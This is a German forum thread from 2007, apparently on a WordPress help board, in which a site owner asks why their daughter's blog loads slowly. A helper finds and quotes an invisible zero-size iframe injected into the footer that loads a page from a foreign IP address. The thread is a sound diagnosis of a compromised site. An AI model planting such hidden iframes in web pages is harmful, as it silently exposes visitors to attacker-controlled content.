Sicherheitsproblem!?

• hallo,

mir ist heute aufgefallen das die Seite meiner Tochter My Brand NEW Miekmeik-Page ;) sehr langsam lädt. Ebenso, das in der Statusleiste beim Start eine IP angezeigt wird.
    Mein Hoster hat mir folgendes geschrieben.

PHP
    ---------------------------------------------------------------------------------------------------------------------------
    Durch die Einbindung von "http://81.95.145.240/logo/index.php" in Ihre
    Startseite wird dies wahrscheinlich auch der Grund für die Anzeige einer IP
    Adresse und für die schlechtere Performance Ihrer Seite.

Es scheint sich hierbei um eine IP Adresse aus Panama City zu handeln ich würde Ihnen empfehlen Ihre Seite gründlich auf diese Einbindung zu prüfen.
    ---------------------------------------------------------------------------------------------------------------------------

Über Hilfe oder Anmerkungen würde ich mich freuen!

Grüße

Einmal editiert, zuletzt von Joseph (20. Juli 2007 um 14:14)

• Anzeige

Hallo!

Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

• ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

Mehr erfahren

• Entferne den IFRAME aus dem Footer!

Ich weiß nicht wer es eingebunden hat, aber es gehört definitiv NICHT in den Code und die Seite läd solange, weil die Seite deiner Tochter die fremde Seite "unsichtbar" im iFrame läd, womit sich die Ladezeit erklärt, zumal der Server früher oder später nicht antwortet, weil nicht erreichbar!

Entferne das bitte (es ist ganz ganz unten nach dem Abschluss von </HTML> !

HTML
    <iframe src='http://81.95.145.240/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
  • Zitat

wäre es möglich, dass die zeile durch ein plugin eingefügt wird?

Keine Ahnung! Die Datei steht auf chmod 644.
    Installiert und aktiviert sind als Plugin: mygallery1.4b7, WP-Guestbook, WP-FGuestbook Paged, Update Monitor.
    Ich habe jetzt auf jeden Fall mal alle Passwörter geändert.
    SecurityScanner schau ich mir mal an! Danke!!!

Nachtrag:
    Oh je, schein wohl etwas schwieriger zu sein den SecurityScanner zu nutzen.

Einmal editiert, zuletzt von cracker (20. Juli 2007 um 13:34)

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!